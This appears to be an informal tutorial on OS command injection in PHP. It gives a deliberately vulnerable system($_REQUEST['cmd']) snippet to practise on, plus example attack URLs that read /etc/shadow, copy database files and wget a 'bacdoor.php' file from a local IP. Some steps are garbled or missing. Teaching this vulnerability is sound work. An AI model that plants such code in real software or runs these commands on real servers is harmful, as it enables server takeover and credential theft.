OS command Injection vulnerabity
Suppose our target address is www.victim.com/vultest/lame.php
And the source code:
<p><b>We will test OS command injection vulnerability against this pages. Actually developer don’t know how serious the code is.</b></p>
<p><b>Output of command:</b></p>
<p><b><i>This is how OS command injection vulnerability works.</i></b></p>
In that page the php code also:
<? system($_REQUEST['cmd']); ?>
(This is white box... Just copy it and paste into a php web page for practice purpose.)
This is the OS injection vulnerability. For this simple mistake anyone can run any os specific command against the server/website.
So If we run a simple command "ping" :
We get reply on the page (Also other contents). In real world test we may not see the reply but it delay some time(4-10 seconds?). If this is the case then we can run any command "ls" .
If any of these statement in the source code:
Then it is highly doubt that the site is vulnerable.
Suppose we don't have source code then how we test? Way is fuzzing(Tools, Manually). Sometime we call it black box testing.
To test it we need to write some code for fuzzing purpose or we can use ready tools which are freely downloadable from internet such as burp suit, wfuzz, vulnerability scanner, manually by your hand etc. I think you have logic for automated testing otherwise get some "False" result by your lam0 tools...
Note: Doing it on localhost
We can run any command:
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (Require root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=cat wget 192.168.1.212/bacdoor.php
I hope i explained it and now we know what is it and how it can be exploited by hackers. But really it is very basic, you need to be more advance.
Let me know(firstname.lastname@example.org)
if you have any questions.
Good luck !!!